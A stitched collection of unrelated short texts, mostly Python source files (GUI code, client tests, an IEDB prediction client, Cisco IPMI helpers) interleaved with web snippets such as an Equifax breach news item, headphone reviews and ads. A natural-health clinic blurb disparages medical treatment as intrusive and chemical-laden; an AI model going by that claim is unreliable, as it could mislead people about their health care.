frameSize=(0, self._width - 15, 0, self._height - 70),
canvasSize=(0, self._width - 80, 0, self._scroll_height),
autoHideScrollBars=False,
scrollBarWidth=12.0,
frameColor=(0, 0, 0, 0),
verticalScroll_relief=DGG.FLAT,
verticalScroll_incButton_relief=DGG.FLAT,
verticalScroll_decButton_relief=DGG.FLAT,
verticalScroll_thumb_relief=DGG.FLAT,
verticalScroll_frameColor=(0.05, 0.05, 0.05, 1),
verticalScroll_thumb_frameColor=(0.8, 0.8, 0.8, 1),
verticalScroll_incButton_frameColor=(0.6, 0.6, 0.6, 1),
verticalScroll_decButton_frameColor=(0.6, 0.6, 0.6, 1),
horizontalScroll_frameColor=(0, 0, 0, 0),
horizontalScroll_relief=False,
horizontalScroll_thumb_relief=False,
horizontalScroll_incButton_relief=False,
horizontalScroll_decButton_relief=False,
parent=self._node,
pos=(0, 1, -self._height))
self._content_node = self._content_frame.getCanvas().attach_new_node(
"BufferComponents")
self._content_node.set_scale(1, 1, -1)
self._content_node.set_z(self._scroll_height)
self._chb_show_images = LabeledCheckbox(
parent=self._node, x=10, y=43, chb_callback=self._set_show_images,
chb_checked=False, text="Display image resources",
text_color=Vec3(0.4), expand_width=330)
def _set_show_images(self, arg):
""" Sets whether images and textures will be shown """
self._display_images = arg
self._perform_update()
def _set_scroll_height(self, height):
""" Sets the maximum scroll height in the content frame """
self._scroll_height = height
self._content_frame["canvasSize"] = (0, self._width - 80, 0, self._scroll_height)
self._content_node.set_z(self._scroll_height)
def _remove_components(self):
""" Removes all components of the buffer viewer """
self._content_node.node().remove_all_children()
self._tex_preview.hide()
def _perform_update(self):
""" Collects all entries, extracts their images and re-renders the
window """
# Collect texture stages
self._stages = []
for entry in self.entries:
if isinstance(entry, Texture):
if self._display_images:
self._stages.append(entry)
# Can not use isinstance or we get circular import references
elif entry.__class__.__name__ == "RenderTarget":
for target in itervalues(entry.targets):
self._stages.append(target)
else:
self.warn("Unrecognized instance!", entry.__class__)
self._render_stages()
def _on_texture_hovered(self, hover_frame, evt=None): # pylint: disable=W0613
""" Internal method when a texture is hovered """
hover_frame["frameColor"] = (0, 0, 0, 0.1)
def _on_texture_blurred(self, hover_frame, evt=None): # pylint: disable=W0613
""" Internal method when a texture is blurred """
hover_frame["frameColor"] = (0, 0, 0, 0)
def _on_texture_clicked(self, tex_handle, evt=None): # pylint: disable=W0613
""" Internal method when a texture is blurred """
self._tex_preview.present(tex_handle)
def _render_stages(self):
""" Renders the stages to the window """
self._remove_components()
entries_per_row = 6
aspect = Globals.base.win.get_y_size() / Globals.base.win.get_x_size()
entry_width = 235
entry_height = (entry_width - 20) * aspect + 55
# Store already processed images
processed = set()
index = -1
# Iterate over all stages
for stage_tex in self._stages:
if stage_tex in processed:
continue
processed.add(stage_tex)
index += 1
stage_name = stage_tex.get_name()
xoffs = index % entries_per_row
yoffs = index // entries_per_row
node = self._content_node.attach_new_node("Preview")
node.set_sz(-1)
node.set_pos(10 + xoffs * (entry_width - 14), 1, yoffs * (entry_height - 14 + 10))
r, g, b = 0.2, 0.2, 0.2
stage_name = stage_name.replace("render_pipeline_internal:", "")
parts = stage_name.split(":")
stage_name = parts[-1]
DirectFrame(
parent=node, frameSize=(7, entry_width - 17, -7, -entry_height + 17),
frameColor=(r, g, b, 1.0), pos=(0, 0, 0))
frame_hover = DirectFrame(
parent=node, frameSize=(0, entry_width - 10, 0, -entry_height + 10),
frameColor=(0, 0, 0, 0), pos=(0, 0, 0), state=DGG.NORMAL)
frame_hover.bind(
DGG.ENTER, partial(self._on_texture_hovered, frame_hover))
frame_hover.bind(
DGG.EXIT, partial(self._on_texture_blurred, frame_hover))
frame_hover.bind(
DGG.B1PRESS, partial(self._on_texture_clicked, stage_tex))
Text(text=stage_name, x=15, y=29, parent=node, size=12, color=Vec3(0.8))
# Scale image so it always fits
w, h = stage_tex.get_x_size(), stage_tex.get_y_size()
padd_x, padd_y = 24, 57
scale_x = (entry_width - padd_x) / max(1, w)
scale_y = (entry_height - padd_y) / max(1, h)
scale_factor = min(scale_x, scale_y)
if stage_tex.get_texture_type() == Image.TT_buffer_texture:
scale_factor = 1
w = entry_width - padd_x
h = entry_height - padd_y
preview = Sprite(
image=stage_tex, w=scale_factor * w, h=scale_factor * h,
any_filter=False, parent=node, x=7, y=40, transparent=False)
preview.set_shader_input("mipmap", 0)
preview.set_shader_input("slice", 0)
preview.set_shader_input("brightness", 1)
preview.set_shader_input("tonemap", False)
preview_shader = DisplayShaderBuilder.build(stage_tex, scale_factor*w, scale_factor*h)
preview.set_shader(preview_shader)
num_rows = (index + entries_per_row) // entries_per_row
self._set_scroll_height(50 + (entry_height - 14 + 10) * num_rows)
|
Cybersecurity expert Morgan Wright discusses why the Equifax data breach probably affects more than 143 million people, and what the penalty should be for the company’s CEO, Richard Smith.
The blows keep coming for Equifax (NYSE:EFX) as shares continue to tumble and the Federal Trade Commission announced plans to open an investigation into the credit reporting company Thursday after the company went public with its massive security breach last week, putting 143 million American’s personal data at risk.
In case you missed all drama, here’s a timeline of events, involving one of the biggest security breaches of all time.
Monday, September 11 - Two key US senators ask Equifax Inc. to answer detailed questions about a breach of information affecting up to 143 million Americans, including whether U.S. government agency records were compromised in the hack.
Tuesday, September 12 - Equifax CEO Richard Smith writes an op-ed for USA Today apologizing for the intrusion and vows to make changes to protect against cyber crimes in the future.
|
from autobahn.wamp.types import SessionDetails, CloseDetails
from asphalt.core import Event
__all__ = ('SessionJoinEvent', 'SessionLeaveEvent')
class SessionJoinEvent(Event):
"""
Signals that the client has joined the WAMP realm on the router.
:ivar details: the autobahn-provided session details
:vartype details: ~autobahn.wamp.types.SessionDetails
"""
__slots__ = 'details'
def __init__(self, source, topic: str, session_details: SessionDetails) -> None:
super().__init__(source, topic)
self.details = session_details
class SessionLeaveEvent(Event):
"""
Signals that the client has left the WAMP realm on the router.
:ivar str reason: the reason why the client left the realm
:ivar str message: the closing message
"""
__slots__ = 'reason', 'message'
def __init__(self, source, topic: str, close_details: CloseDetails) -> None:
super().__init__(source, topic)
self.reason = close_details.reason
self.message = close_details.message
|
Saturday’s Cage/Gould concert at RPI’s EMPAC in Troy NY is the next in a long line of John Cage centenary tributes happening this year. Featuring the Rensselaer Contemporary Music Ensemble directed by Michael Century, the program includes works by John Cage juxtaposed with a recreation of part of Glenn Gould’s final piano concert.
The french philosopher Elie During knits it all together in a pre-performance lecture (5pm) with the help of a vacuum cleaner (no kidding!) or at least the metaphor of a vacuum cleaner or the memory of the sound of a vacuum cleaner or the memory of the experience of the obliteration of all other sounds thanks to a vacuum cleaner… I guess we’ll have to go to the lecture to find out for sure.
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
from turbogears.database import session
from bkr.inttest import data_setup, with_transaction
from bkr.inttest.client import run_client, create_client_config, \
ClientError, ClientTestCase
class JobCommentTest(ClientTestCase):
@with_transaction
def setUp(self):
self.job = data_setup.create_completed_job()
def test_invalid_taskpec(self):
try:
run_client(['bkr', 'job-comment', '12345'])
self.fail('should raise')
except ClientError as e:
self.assertIn('Invalid taskspec', e.stderr_output)
def test_post_comment_to_recipeset(self):
with session.begin():
recipe = self.job.recipesets[0]
comment_text = u'Never gonna give you up'
out = run_client(['bkr', 'job-comment', recipe.t_id,
'--message', comment_text])
with session.begin():
session.expire_all()
self.assertEqual(recipe.comments[0].comment, comment_text)
def test_post_comment_to_recipetask(self):
with session.begin():
recipe = self.job.recipesets[0].recipes[0]
task = recipe.tasks[0]
comment_text = u'Never gonna let you down'
out = run_client(['bkr', 'job-comment', task.t_id,
'--message', comment_text])
with session.begin():
session.expire_all()
self.assertEqual(task.comments[0].comment, comment_text)
def test_post_comment_to_task_result(self):
with session.begin():
recipe = data_setup.create_recipe()
job = data_setup.create_job_for_recipes([recipe])
data_setup.mark_job_complete(job)
result = recipe.tasks[0].results[0]
comment_text = u'Never gonna run around and desert you'
out = run_client(['bkr', 'job-comment', result.t_id,
'--message', comment_text])
with session.begin():
session.expire_all()
self.assertEqual(result.comments[0].comment, comment_text)
def test_anonymous_user_cannot_comment(self):
with session.begin():
client_config = create_client_config(username=None, password=None)
comment_text = u'Never gonna make you cry'
try:
run_client(['bkr', 'job-comment', self.job.recipesets[0].t_id,
'--message', comment_text], config=client_config)
self.fail('should raise')
except ClientError as e:
self.assertEquals(e.status, 1)
self.assertIn('Invalid username or password', e.stderr_output)
def test_empty_comment_is_rejected(self):
try:
run_client(['bkr', 'job-comment', self.job.recipesets[0].t_id,
'--message', ''])
self.fail('should raise')
except ClientError as e:
self.assertIn('Comment text cannot be empty', e.stderr_output)
def test_post_comment_on_multiple_taskspec(self):
with session.begin():
job = data_setup.create_completed_job()
recipe1 = self.job.recipesets[0]
recipe2 = job.recipesets[0]
comment_text = u'Never gonna say goodbye'
out = run_client(['bkr', 'job-comment', recipe1.t_id, recipe2.t_id,
'--message', comment_text])
with session.begin():
session.expire_all()
self.assertEqual(recipe1.comments[0].comment, comment_text)
self.assertEqual(recipe2.comments[0].comment, comment_text)
def test_post_comment_to_tr_taskspec_string_fails(self):
comment_text = u'Never gonna tell a lie...'
try:
run_client(['bkr', 'job-comment', 'TR:thisisnotanint', '--message',
comment_text])
self.fail('should raise')
except ClientError as e:
self.assertIn('Recipe task result not found', e.stderr_output)
|
On a Mission to Find the Best Gelato in Rome. Since moving to Rome in 2001, I have made it my mission to seek out the best gelato in Rome . . .I am still on that mission.
Rome is truly an astonishing city, a cross between the high rises of a modern society with the scatter of ruins from a historic era. This city is claimed to be one of the oldest named cities in the world!A city that is so old, that it has been called ‘The Eternal City’.
|
"""
Basic classes and functions for semantic representations.
"""
from typing import (Optional, Mapping, Tuple, List, Union, Sequence)
from delphin.lnk import Lnk, LnkMixin
# Default modules need to import the PyDelphin version
from delphin.__about__ import __version__ # noqa: F401
# Basic Types
# Identifiers are node ids in DMRS and EDS, or variables in MRS
# including handles and underspecified variables
Identifier = Union[str, int]
Role = str
RoleArgument = Tuple[Role, Identifier]
ArgumentStructure = Mapping[Identifier, List[RoleArgument]]
PropertyMap = Mapping[str, str]
# Functions for the default ordering of feature lists
def role_priority(role: str) -> Tuple[bool, bool, str]:
"""Return a representation of role priority for ordering."""
# canonical order: LBL ARG* RSTR BODY *-INDEX *-HNDL CARG ...
role = role.upper()
return (
role != 'LBL',
role in ('BODY', 'CARG'),
role
)
_COMMON_PROPERTIES = (
'PERS', # [x] person (ERG, Jacy)
'NUM', # [x] number (ERG, Jacy)
'GEND', # [x] gender (ERG, Jacy)
'IND', # [x] individuated (ERG)
'PT', # [x] pronoun-type (ERG)
'PRONTYPE', # [x] pronoun-type (Jacy)
'SF', # [e] sentential-force (ERG)
'TENSE', # [e] tense (ERG, Jacy)
'MOOD', # [e] mood (ERG, Jacy)
'PROG', # [e] progressive (ERG, Jacy)
'PERF', # [e] perfective (ERG, Jacy)
'ASPECT', # [e] other aspect (Jacy)
'PASS', # [e] passive (Jacy)
)
_COMMON_PROPERTY_INDEX = dict((p, i) for i, p in enumerate(_COMMON_PROPERTIES))
def property_priority(prop: str) -> Tuple[int, str]:
"""
Return a representation of property priority for ordering.
Note:
The ordering provided by this function was modeled on the ERG
and Jacy grammars and may be inaccurate for others. Properties
not known to this function will be sorted alphabetically.
"""
index = _COMMON_PROPERTY_INDEX.get(prop.upper(), len(_COMMON_PROPERTIES))
return (index, prop)
# Classes for Semantic Structures
class Predication(LnkMixin):
"""
An instance of a predicate in a semantic structure.
While a predicate (see :mod:`delphin.predicate`) is a description
of a possible semantic entity, a predication is the instantiation
of a predicate in a semantic structure. Thus, multiple predicates
with the same form are considered the same thing, but multiple
predications with the same predicate will have different
identifiers and, if specified, different surface alignments.
"""
__slots__ = ('id', 'predicate', 'type', 'base')
def __init__(self,
id: Identifier,
predicate: str,
type: Union[str, None],
lnk: Optional[Lnk],
surface,
base):
super().__init__(lnk, surface)
self.id = id
self.predicate = predicate
self.type = type
self.base = base
def __repr__(self):
return '<{} object ({}:{}{}{}) at {}>'.format(
self.__class__.__name__,
self.id,
self.predicate,
str(self.lnk),
'[{}]'.format(self.type or '?'),
id(self))
# Structure types
Predications = Sequence[Predication]
MaybePredication = Union[Predication, None]
PredicationPair = Tuple[MaybePredication, MaybePredication]
class SemanticStructure(LnkMixin):
"""
A basic semantic structure.
DELPH-IN-style semantic structures are rooted DAGs with flat lists
of predications.
Args:
top: identifier for the top of the structure
predications: list of predications in the structure
identifier: a discourse-utterance identifier
Attributes:
top: identifier for the top of the structure
predications: list of predications in the structure
identifier: a discourse-utterance identifier
"""
__slots__ = ('top', 'predications', 'identifier', '_pidx')
def __init__(self,
top: Optional[Identifier],
predications: Predications,
lnk: Optional[Lnk],
surface,
identifier):
super().__init__(lnk, surface)
self.top = top
self.predications = predications
self._pidx = {p.id: p for p in predications}
self.identifier = identifier
def __repr__(self):
return '<{} object ({}) at {}>'.format(
self.__class__.__name__,
' '.join(p.predicate for p in self.predications),
id(self))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
return (self.top == other.top
and self.predications == other.predications)
def __contains__(self, id):
return id in self._pidx
def __getitem__(self, id):
return self._pidx[id]
def arguments(self, types=None, expressed=None) -> ArgumentStructure:
"""
Return a mapping of the argument structure.
Args:
types: an iterable of predication types to include
expressed: if `True`, only include arguments to expressed
predications; if `False`, only include those
unexpressed; if `None`, include both
Returns:
A mapping of predication ids to lists of (role, target)
pairs for outgoing arguments for the predication.
"""
raise NotImplementedError()
def properties(self, id: Identifier) -> PropertyMap:
"""Return the morphosemantic properties for *id*."""
raise NotImplementedError()
def is_quantifier(self, id: Identifier) -> bool:
"""Return `True` if *id* represents a quantifier."""
raise NotImplementedError()
def quantification_pairs(self) -> List[PredicationPair]:
"""
Return a list of (Quantifiee, Quantifier) pairs.
Both the Quantifier and Quantifiee are :class:`Predication`
objects, unless they do not quantify or are not quantified by
anything, in which case they are `None`. In well-formed and
complete structures, the quantifiee will never be `None`.
Example:
>>> [(p.predicate, q.predicate)
... for p, q in m.quantification_pairs()]
[('_dog_n_1', '_the_q'), ('_bark_v_1', None)]
"""
raise NotImplementedError()
|
Sony WH-CH500 Wireless Bluetooth NFC On-Ear Headphones : The Best Budget Headphones !
These headphones are truly amazing , best bass and lows and highs , honestly these i are the best pair of bluetooth headphones i have ever owned. Very light weight and has a good fit so it doesn’t fall off. If your that person that commutes to work by walking bus or train , this i definitely for you. The sound is very punch it looks very stylish but at the same tim very discrete will all three colours.
Did a lot of research and found i kept coming back to these as a present for my wife who had described what she would like. If i have one problem with the it’s struggling to say anything to her as she walk she around the house with them on her head. Good duration between charges, easy to use, pairs with your audio with no problem and she really likes the sound quality. I think they’ve been a good buy. Luckily i also found a blue case to go with them elsewhere on amazon so they can go travelling too without any problem though they don’t take up much space when folded.
These are good, inexpensive basic over ear headphones. They don’t deliver the greatest sound quality but are perfectly good for my intended use (pc for streaming video, podcasts/music whilst dog walking with iphone 6). Paired easily with my pc and iphone. Would recommend as a basic set – pay more for a better set if that’s what you want.
I normally buy expensive headphones because i expect good quality for the price but after my second pair of bowers and wilkins p7’s failed after 2 months use i gave up and went back to the only headphone make that i have never had problems with. I had a 4 year old set of sony headphones years back and only got rid of because the cups wore out. The cups hold in place well and the battery lasts plenty of hours.
The headphones were delivered quickly and nicely packaged. They look nice and feel like good quality. I particularly like that both earpiece can we turned to make the whole unit flat (good for travel). Very easy to connect and sound quality is good. However, they are not very comfortable. The top part is not completely smooth so start hurting the top of your head after a while and the earpieces are a little on the small side so that after long wear it hurt your ear as the padding sits on the edges of your ears and start pressing.
I thought by spending 2-3 times more than the non popular brands, ie relatively unknown chinese brands, you would get a compelling product. But no, they still sound barely ok and have no life in the audio. Save yourself some time and money and either get something like the august ep650 or just spend the big bucks and get the usual high quality expensive stuff if you are going to listen to lots of audio.
I bought these headphones as my workout headphones as i don’t want to damage my main headphones bose qc35 ii. So i am comparing these to a £250 pair of headphones, which is something to bear in mind. Build quality – average – cheap plastically look and feel but the all-black colour hides this somewhat. The buttons are very cheap, feel like they will only work 50% of the time (but they do work all the time)sounds quality – happily surprised – the sound quality is pretty good, even when i’m comparing it to my bose.The sound range is great, the base is pretty good and i didn’t find anything that made me think ‘that was bad’. There is no noise canceling, but that is what i desired as i wear them when running and still want to be aware of surrounding. Fit – takes some getting used to – they are pretty tight and they are on-the-ear, so won’t cover the whole ear. It takes some getting use to/adjusting to find that sweet spot, but they are very secure on the head (perfect for exercise)overall, pretty good headphones, i wouldn’t pay over £40 for these, but they provide good sound quality, but they are a budget built headphone.
I bought these as i wear hearing aids, and am unable to wear conventional ones.
Product Description, Connect, listen, enjoy and indulge in a seamless personal audio experience with the Sony WH-CH500 wireless headphones. Enjoy detailed and dynamic sound from 30 mm dome drivers, combined with the freedom of wireless connectivity. You can now listen for even longer with up to 20 hours wireless playback and the sleek, swivel fold design not only delivers a minimalist style, but also makes them easy to fold and store, perfect for travel. There’s also a high quality built-in microphone, enabling hands free voice calls without the need to access your phone. With the press of one button you can activate the Google Assistant or Siri from your smart phone, so you can ask questions and receive answers directly through your headphones.
Wirelessly stream your favourite tracks with a Bluetooth connection. Pair your smartphone or tablet with these headphones wirelessly, and you can enjoy your music and even control playlists and volume right from your headphones.
Near Field Communication (NFC) technology makes complex set-up sequences a thing of the past. Simply touch selected NFC-enabled devices to the on-body N-mark for a quick, seamless connection, then start streaming content via Bluetooth connection. No NFC? No problem. You can still manually make a Bluetooth connection using your device’s settings menu.
Keep your tunes playing throughout the day. A built-in Li-ion battery delivers up to 20 hours of power in wireless and is rechargeable via Micro USB.
Take these headphones anywhere you go. A swivel design makes it simple and safe to store them when you’re on the move. The earcups swivel flat for easy packing in a suitcase or slipping into a bag.
Enjoy more of the detail in all your favourite songs thanks to 30 mm dome drivers, which deliver dynamic sound from compact, lightweight units.
Select and wear the colour that suits you best. Choose from black, grey or blue.
I’m speechless of how a set of bluetooth headphones can sound like this?. My problem in the past with earphones was that you didn’t have enough power to drive them. These are on another level i can’t put them into words. I have a few pairs of wired sennheisers, and although they may not be as good. These blow everything out the water for under a hundred quidi’m gobsmacked, these are amazing.
My partner, our son and i all have these headphones. After getting these headphones for my partner for christmas my son then begged to get a pair. Both using them for gym and boxing they have been beaming with joy that not only do they stay on when doing cardio but the sound quality is superb. The battery life is pretty good too and very fast to charge :)would defiantly recommend them to anyone looking for wireless headphones.
Stunning, comfortable and great sound quality. I use them all the time and they are perfect for the gym as well which was exactly what i was looking for. (had to return another pair recently because they were bigger and looser, especially when moving around. But these are perfect)the only downside is that when the volume is up, it actually comes out so people around me can hear it. Not a big fan of it, but i can live with it. So definitely worth 5 stars.
Possibly the best thing i’ve bought from amazon – straight up – these compact headphones have excellent sound quality, really easy to pair, very comfy on the ear and with an overnight charge you will have boombastic sounds all day. Highly recommended purchase.
The sound is great but unfortunately is not a very good fit around the ears and is very loose on the head and tends to fall off when bending over to pick up something. You’ll need to be fast and a good catcher to stop it hitting the floor.
I think these are good value for money if you’re on a budget but i decided to pay a little more for a more premium pair. I ended up returning these headphones because they were uncomfortable for me and the plastic they’re made of looked flimsy. I can’t speak of the battery life and sound quality because i didn’t really use them before returning. Would recommend buying these if you’re not willing to pay more for a pair.
Can not connect to the TV via Bluetooth. Not compatible. This headphone is also not compatible with a TV, this is only possible from the series WHH900N / Wh1000X.
|
from statsd.connection import Connection
from statsd.client import Client
from statsd.timer import Timer
from statsd.gauge import Gauge
from statsd.average import Average
from statsd.raw import Raw
from statsd.counter import Counter, increment, decrement
__all__ = [
'Client',
'Connection',
'Timer',
'Counter',
'Gauge',
'Average',
'Raw',
'increment',
'decrement',
]
# The doctests in this package, when run, will try to send data on the wire.
# To keep this from happening, we hook into nose's machinery to mock out
# `Connection.send` at the beginning of testing this package, and reset it at
# the end.
_connection_patch = None
def setup_package():
# Since we don't want mock to be a global requirement, we need the import
# the setup method.
import mock
global _connection_patch
_connection_patch = mock.patch('statsd.Connection.send')
send = _connection_patch.start()
send.return_value = True
def teardown_package():
assert _connection_patch
_connection_patch.stop()
|
Our health is our most important attribute. Without it, we can’t do much else in life. Staying healthy can be a challenge and we can’t predict or control if or when we get sick. However, there are things we can do to improve our quality of life.
Medical science is helpful for injuries and illness, but it can also be incredibly intrusive and pump our bodies full of chemicals. Taking a natural approach and finding ways for the body to heal itself is the least intrusive way for a person to overcome illness and injury and stay healthy.
We want to help you feel better. We’ll take the time to do a full body diagnosis and get to know you from every angle. We’ll create a treatment program that will work for you and with you to get you to optimum health and keep you there.
|
# Copyright (c) 2014. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib2
import urllib
from StringIO import StringIO
import logging
import re
import pandas as pd
from mhc_common import normalize_hla_allele_name, seq_to_str, convert_str
from peptide_binding_measure import (
IC50_FIELD_NAME, PERCENTILE_RANK_FIELD_NAME
)
"""
A note about prediction methods, copied from the IEDB website:
The prediction method list box allows choosing from a number of MHC class I
binding prediction methods:
- Artificial neural network (ANN),
- Stabilized matrix method (SMM),
- SMM with a Peptide:MHC Binding Energy Covariance matrix (SMMPMBEC),
- Scoring Matrices from Combinatorial Peptide Libraries (Comblib_Sidney2008),
- Consensus,
- NetMHCpan.
IEDB recommended is the default prediction method selection.
Based on availability of predictors and previously observed predictive
performance, this selection tries to use the best possible method for a given
MHC molecule. Currently for peptide:MHC-I binding prediction, for a given MHC
molecule, IEDB Recommended uses the Consensus method consisting of ANN, SMM,
and CombLib if any corresponding predictor is available for the molecule.
Otherwise, NetMHCpan is used. This choice was motivated by the expected
predictive performance of the methods in decreasing order:
Consensus > ANN > SMM > NetMHCpan > CombLib.
"""
VALID_IEDB_METHODS = [
'recommended',
'consensus',
'netmhcpan',
'ann',
'smmpmbec',
'smm',
'comblib_sidney2008'
]
def _parse_iedb_response(response):
"""
Take the binding predictions returned by IEDB's web API
and parse them into a DataFrame
"""
lines = response.split("\n")
# manually parsing since Pandas is insane
header_names = lines[0].split("\t")
d = {}
for col_name in header_names:
d[col_name] = []
for line in lines[1:]:
line = line.strip()
if len(line) > 0:
fields = line.split('\t')
for i, header_name in enumerate(header_names):
value = convert_str(fields[i] if len(fields) > i else None)
d[header_name].append(value)
return pd.DataFrame(d)
def _query_iedb(request_values, url):
"""
Call into IEDB's web API for MHC binding prediction using request dictionary
with fields:
- "method"
- "length"
- "sequence_text"
- "allele"
Parse the response into a DataFrame.
"""
data = urllib.urlencode(request_values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req).read()
return _parse_iedb_response(response)
class IEDB_MHC_Binding_Predictor(object):
def __init__(
self,
alleles,
lengths,
method,
url):
assert isinstance(alleles, (list,tuple)), \
"Alleles must be a sequence, not: %s" % alleles
self._alleles = alleles
assert isinstance(lengths, (list,tuple)), \
"Peptide lengths must be a sequence, not: %s" % (lengths,)
assert all(isinstance(l, (int,long)) for l in lengths), \
"Not all integers: %s" % (lengths,)
self._lengths = lengths
assert method in VALID_IEDB_METHODS, \
"Invalid IEDB MHC binding prediction method: %s" % (method,)
self._method = method
self._url = url
def _get_iedb_request_params(self, sequence, allele=None):
# sometimes we can get joint predictions for all alleles
if allele is None:
allele = seq_to_str(self._alleles)
params = {
"method" : seq_to_str(self._method),
"length" : seq_to_str(self._lengths),
"sequence_text" : sequence,
"allele" : allele,
}
return params
def predict(self, data):
"""
Given a dataframe with long amino acid sequences in the
'SourceSequence' field, return an augmented dataframe
with shorter k-mers in the 'Epitope' column and several
columns of MHC binding predictions with names such as 'percentile_rank'
"""
# take each mutated sequence in the dataframe
# and general MHC binding scores for all k-mer substrings
responses = {}
for i, peptide in enumerate(data.SourceSequence):
for allele in self._alleles:
key = (peptide, allele)
if key not in responses:
request = self._get_iedb_request_params(peptide, allele)
logging.info(
"Calling IEDB (%s) with request %s",
self._url,
request)
response_df = _query_iedb(request, self._url)
response_df.rename(
columns={
'peptide': 'Epitope',
'length' : 'EpitopeLength',
'start' : 'EpitopeStart',
'end' : 'EpitopeEnd',
'allele' : 'Allele',
},
inplace=True)
response_df['EpitopeStart'] -= 1
response_df['EpitopeEnd'] -= 1
responses[key] = response_df
else:
logging.info(
"Already made predictions for peptide %s with allele %s",
peptide,
allele)
# concatenating the responses makes a MultiIndex with two columns
# - SourceSequence
# - index of epitope from that sequence's IEDB call
#
# ...when we reset the index, we turn these into two columns
# named 'level_0', and 'level_1'. We want to rename the former
# and delete the latter.
responses = pd.concat(responses).reset_index()
responses['SourceSequence'] = responses['level_0']
del responses['level_0']
del responses['level_1']
# IEDB has inclusive end positions, change to exclusive
responses['EpitopeEnd'] += 1
assert 'ann_rank' in responses, responses.head()
responses[PERCENTILE_RANK_FIELD_NAME] = responses['ann_rank']
assert 'ann_ic50' in responses, responses.head()
responses[IC50_FIELD_NAME] = responses['ann_ic50']
# instead of just building up a new dataframe I'm expliciting
# dropping fields here to document what other information is available
drop_fields = (
'seq_num',
'method',
'ann_ic50',
'ann_rank',
'consensus_percentile_rank',
'smm_ic50',
'smm_rank',
'comblib_sidney2008_score',
'comblib_sidney2008_rank'
)
for field in drop_fields:
if field in responses:
responses = responses.drop(field, axis = 1)
result = data.merge(responses, on='SourceSequence')
# some of the MHC scores come back as all NaN so drop them
result = result.dropna(axis=1, how='all')
return result
class IEDB_MHC1(IEDB_MHC_Binding_Predictor):
def __init__(self,
alleles,
lengths=[9],
method='recommended',
url='http://tools.iedb.org/tools_api/mhci/'):
IEDB_MHC_Binding_Predictor.__init__(
self,
alleles=alleles,
lengths=lengths,
method=method,
url=url)
class IEDB_MHC2(IEDB_MHC_Binding_Predictor):
def __init__(self,
alleles,
method='recommended',
url='http://tools.iedb.org/tools_api/mhcii/'):
IEDB_MHC_Binding_Predictor.__init__(
self,
alleles=alleles,
lengths=[15],
method=method,
url=url)
def _get_iedb_request_params(self, sequence):
params = {
"method" : seq_to_str(self._method),
"sequence_text" : sequence,
"allele" : seq_to_str(self._alleles),
}
return params
|
Demon WP Insecticide is an advanced formulation taking advantage of Cypermethrin. Demon WP Insecticide is an advanced-generation Pyrethriod provides excellent control at extremely low concentrations. Demon WP Insecticide is an odorless wettable powder in water soluble packets (2 packets/bag). Demon WP takes command of roaches & other major insects inside the home. Quick knock-down & fast flushing while providing excellent residual control.
|
# Copyright 2016 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module implements all the communication services
"""
from imcsdk.mometa.comm.CommIpmiLan import CommIpmiLan
from imcsdk.imccoreutils import get_server_dn, IMC_PLATFORM
def _get_comm_mo_dn(handle, server_id=1):
"""
Internal method to get the IPMI mo's parent_dn based \
on the type of platform
"""
from imcsdk.imcexception import ImcValidationException
if handle.platform == IMC_PLATFORM.TYPE_CLASSIC:
return("sys/svc-ext")
elif handle.platform == IMC_PLATFORM.TYPE_MODULAR:
return(get_server_dn(handle, server_id) + "/svc-ext")
else:
raise ImcValidationException("Invalid platform detected:%s" %
handle.platform)
def ipmi_enable(handle, priv=None, key=None, server_id=1):
"""
Enable IPMI over LAN.
Args:
handle (ImcHandle)
priv (string): Optional privilege level: 'admin', 'user', 'read-only'
key (string): Optional encryption key as hexadecimal string
server_id (int): Server Id to be specified for C3260 platforms
Returns:
CommIpmiLan object
Raises:
ValueError if privilege or key are invalid
Example:
if ipmi_enable(handle):
print "IPMI Enabled"
"""
# Verify key is a hex number
try:
if key:
hex(int(key, 16))[2:]
except ValueError:
raise ValueError('{0}: ERROR: Encryption key is not hex number: ' +
'"{1}"'.format(handle.ip, key))
# Create enabled IPMI object
mo = CommIpmiLan(parent_mo_or_dn=_get_comm_mo_dn(handle, server_id))
mo.admin_state = "enabled"
mo.priv = priv
mo.key = key
# Configure IPMI object on CIMC
handle.set_mo(mo)
return mo
def ipmi_disable(handle, server_id=1):
"""
Disable IPMI over LAN.
Args:
handle (ImcHandle)
server_id (int): Server Id to be specified for C3260 platforms
Returns:
CommIpmiLan object
"""
# Create disabled IPMI object
mo = CommIpmiLan(parent_mo_or_dn=_get_comm_mo_dn(handle, server_id))
mo.admin_state = "disabled"
# Configure IPMI object on CIMC
handle.set_mo(mo)
return mo
def ipmi_exists(handle, server_id=1, **kwargs):
"""
Check if IPMI over LAN is enabled
Args:
handle (ImcHandle)
server_id (int): Server Id to be specified for C3260 platforms
Returns:
True/False, MO/None
"""
mo = CommIpmiLan(parent_mo_or_dn=_get_comm_mo_dn(handle, server_id))
mo = handle.query_dn(mo.dn)
if mo is None:
return False, None
kwargs['admin_state'] = "enabled"
mo_exists = mo.check_prop_match(**kwargs)
return (mo_exists, mo)
|
Gale databases curated for our school! InfoBits covers a broad range of topics and includes images, articles from encyclopedias, magazines, and the news. National Geographic Kids includes topics on science, nature and space with videos and articles.
|
# -*- coding: utf-8 -*-
from django import template
from core.utils import duration_parts, duration_string as d_string
register = template.Library()
@register.filter
def duration_string(duration, precision='s'):
"""
Format a duration (e.g. "2 hours, 3 minutes, 35 seconds").
:param duration: a timedetla instance.
:param precision: the level of precision to return (h for hours, m for
minutes, s for seconds)
:returns: a string representation of the duration.
"""
